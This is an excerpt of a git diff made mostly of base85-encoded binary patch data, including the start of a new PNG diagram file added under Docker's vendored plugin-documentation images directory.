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
AiU0rr

literal 0
HcmV?d00001

diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png b/vendor/github.com/docker/docker/docs/extend/images/authz_connection_hijack.png
new file mode 100644
index 0000000000000000000000000000000000000000..f13a2987b28d70f81bda7096a54ec479f20b2690
GIT binary patch
literal 38780
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
